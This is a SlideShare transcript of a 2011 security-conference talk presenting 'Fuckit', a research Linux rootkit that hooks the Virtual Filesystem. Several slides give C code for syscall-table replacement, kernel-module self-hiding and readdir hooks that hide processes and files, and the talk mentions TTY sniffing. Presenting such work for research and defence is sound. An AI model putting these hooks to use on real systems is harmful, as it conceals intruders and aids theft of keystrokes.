Your SlideShare is downloading. ×
0
Confraria Security & IT - Lisbon Set 29, 2011
Confraria Security & IT - Lisbon Set 29, 2011
Confraria Security & IT - Lisbon Set 29, 2011
Confraria Security & IT - Lisbon Set 29, 2011
Confraria Security & IT - Lisbon Set 29, 2011
Confraria Security & IT - Lisbon Set 29, 2011
Confraria Security & IT - Lisbon Set 29, 2011
Confraria Security & IT - Lisbon Set 29, 2011
Confraria Security & IT - Lisbon Set 29, 2011
Confraria Security & IT - Lisbon Set 29, 2011
Confraria Security & IT - Lisbon Set 29, 2011
Confraria Security & IT - Lisbon Set 29, 2011
Confraria Security & IT - Lisbon Set 29, 2011
Confraria Security & IT - Lisbon Set 29, 2011
Confraria Security & IT - Lisbon Set 29, 2011
Confraria Security & IT - Lisbon Set 29, 2011
Confraria Security & IT - Lisbon Set 29, 2011
Confraria Security & IT - Lisbon Set 29, 2011
Confraria Security & IT - Lisbon Set 29, 2011
Confraria Security & IT - Lisbon Set 29, 2011
Confraria Security & IT - Lisbon Set 29, 2011
Confraria Security & IT - Lisbon Set 29, 2011
Upcoming SlideShare
Loading in...5
×

Thanks for flagging this SlideShare!

Oops! An error has occurred.

×
Saving this for later? Get the SlideShare app to save on your phone or tablet. Read anywhere, anytime – even offline.
Text the download link to your phone
Standard text messaging rates apply

Confraria Security & IT - Lisbon Set 29, 2011

206

Published on

Published in: Technology
0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total Views
206
On Slideshare
0
From Embeds
0
Number of Embeds
0
Actions
Shares
0
Downloads
1
Comments
0
Likes
0
Embeds 0
No embeds

Report content
Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
No notes for slide

Transcript

  • 1. Linux rootkits without syscall patching, (the VFS way)
    Confraria SECURITY & IT – 28 Set 2011
  • 2. #> whoami
    • Ricardo Mourato – 25 yo
    • 3. Computer Science Degree
    • 4. InfoSec & SuperBock Stout addicted
    • 5. OS X, Slackware, FreeBSD, OpenBSD, Solaris fanatic
    • 6. Java, .Net, Python, Ruby, C, C++, ASM Lover
    • 7. Windows (All versions) , Perl (All versions) and Printers (Yes, they came from hell !) hater
    • 8. root, right here :)
    2
  • 9. Agenda
    • Linux rootkits – brief talk
    • 10. Linux 2.{5,6} kernel – what changed ?
    • 11. The Virtual Filesystem (VFS)
    • 12. Meet /proc, our friend!
    • 13. Introducing
    • 14. Show time 
    • 15. Retrospect
    • 16. Questions & Answers
    3
  • 17. Linux rootkits – how they were?
    • In the beginning…
    • 18. User-land Trojaned binaries mostly
    • 19. Easy to spot
    • 20. Easy to code
    • 21. However, hard to hide!
    • 22. LRK5 was a good bastard…
    4
  • 23. Linux rootkits – how they were?
    • Not so far away…
    • 24. The Kernel-land approach
    • 25. Loadable Kernel Modules or /dev/kmem “patching”
    • 26. Syscall patching
    • 27. Easy to code
    • 28. Less easy to find
    Adore & suckit were also good bastards!
    5
  • 29. Linux rootkits – how they were?
    extern void *sys_call_table[];
    int init_module(void) {
    original_call = sys_call_table[__NR_open];
    sys_call_table[__NR_open] =evil_open;
    return 0;
    }
    6
  • 30. Linux 2.{5,6} – what changed?
    • Main change:
    • 31. OMG! sys_call_table[] no longer exported!!!
    • 32. Even if you find it, it will be read-only
    • 33. Workaround:
    • 34. Find IDT
    • 35. Find the 0x80 interrupt
    • 36. Get the system_call() function location
    • 37. Use gdb kung fu and search memory for sys_call_table[] within this function
    7
  • 38. Linux 2.{5,6} – what changed?
    $ gdb -q /usr/src/linux/vmlinux
    (no debugging symbols found)...(gdb) disass system_call

    0xc0106bf4 : call *0xc01e0f18(,%eax,4)

    (gdb) print &sys_call_table
    $1 = ( *) 0xc01e0f18
    8
  • 39. The Virtal Filesystem
    • Is the primary interface to underlying filesystems (common file model)
    • 40. Exports a set of interfaces for every individual filesystem
    • 41. Each filesystem must “implement” this interface in order to become a common file model
    • 42. Some interesting players are:
    • 43. struct dentry;
    • 44. struct file_operations;
    • 45. struct inode_operations;
    9
  • 46. /proc is our friend
    • So… everything in linux “is a file” right?
    • 47. Including the ones located at /proc even if “in memory”
    • 48. And… most user-land tools rely on /proc to get information!
    • 49. This tools include:
    • 50. ps
    • 51. netstat
    • 52. top
    • 53. mount
    • 54. And many, many others…
    • 55. Remember struct file_operations ? 
    10
  • 56. Introducing Fuckit…
    • Fu Control Kit (just in case!)
    • 57. A research born VFS rootkit capable of:
    • 58. Hide itself  No sh*t sherlock?
    • 59. Hide processes
    • 60. Hide files and directories
    • 61. TTY sniffing
    11
  • 62. Module hiding
    • Modules are linked together in a double link list maintained by the kernel
    • 63. The kernel have internal functions to “unlink” the unloaded modules from the list
    • 64. Just use them wisely 
    12
  • 65. Module hiding
    static struct module *m = THIS_MODULE;
    void hideme(void){
    kobject_del(&m->mkobj.kobj);
    list_del(&m->list);
    }
    13
  • 66. “Hook” the Virtual Filesystem (/proc)
    static struct file_operations *proc_fops;  remember again? 
    void hook_proc(void){
    /* we are not /proc yet */
    key = create_proc_entry(KEY,0666,NULL);
    /* now we become /proc :) */
    proc = key->parent;
    /* save the original, we will need it later*/
    proc_fops = (struct file_operations *)proc->proc_fops;
    original_proc_readdir = proc_fops->readdir;
    /* tha hook */
    proc_fops->readdir = fuckit_proc_readdir;
    }
    14
  • 67. “Hook” the Virtual Filesystem (/)
    static struct file *f;
    int hook_root(void){
    f = filp_open("/",O_RDONLY,0600);
    if(IS_ERR(f)){
    return -1;
    }
    original_root_readdir = f->f_op->readdir;
    f->f_op->readdir=fuckit_root_readdir;
    filp_close(f,NULL);
    return 0;
    }
    15
  • 68. Process hiding
    static inline int fuckit_proc_filldir(void *__buf, const char *name, int namelen, loff_t offset, u64 ino, unsigned d_type){
    //our hidden PID :)
    if(!strcmp(name,HIDDEN_PID) || !strcmp(name,KEY)){
    return 0;
    }
    return original_filldir(__buf,name,namelen,offset,ino,d_type);
    }
    static inline int fuckit_proc_readdir(struct file *filp, void *dirent, filldir_t filldir){
    //save this, we will need to return it later
    original_filldir = filldir;
    return original_proc_readdir(filp,dirent,fuckit_proc_filldir);
    }
    16
  • 69. File and Directory hiding
    static int fuckit_root_filldir(void *__buf, const char *name, int namelen, loff_t offset, u64 ino, unsigned d_type){
    //if is our hidden file/directory return nothing! :)
    if(strncmp(name,HIDDEN_DIR,namelen)==0){
    return 0;
    }
    return original_root_filldir(__buf,name,namelen,offset,ino,d_type);
    }
    static int fuckit_root_readdir(struct file *filp, void *dirent, filldir_t filldir){
    //save this, we will need to return it later
    original_root_filldir = filldir;
    return original_root_readdir(filp,dirent,fuckit_root_filldir);
    }
    17
  • 70. Seeing is believing
    18
  • 71. Retrospect
    • Syscall patching in 2.6 kernel is a true “pain in the a**”
    • 72. VFS hooks, they also do the job!
    • 73. It is a good approach, however it has some cons
    • 74. It is possible to “brute force” /proc for hidden pids
    • 75. You should let the Linux scheduler do this job!
    • 76. Hypervisor rootkits will kill -9 every kernel rookits on earth! 
    19
  • 77. References
    • IBM developerWorks “Anatomy of the Linux filesystem”. Internet: http://www.ibm.com/developerworks/linux/library/l-linux-filesystem/. [Jan 25, 2011]
    • 78. WangYao “Rootkit on Linux x86 v2.6” [Apr 21, 2009]
    • 79. Dump “hideme (ng)”. Internet: http://trace.dump.cz/projects.php [Jan 25, 2011]
    • 80. Ubra “Process Hiding & The Linux scheduler”. Internet: http://www.phrack.org/issues.html?issue=63&id=18 [Jan 25, 2011]
    20
  • 81. 21
  • 82. Questions & Answers
    ?
    22

×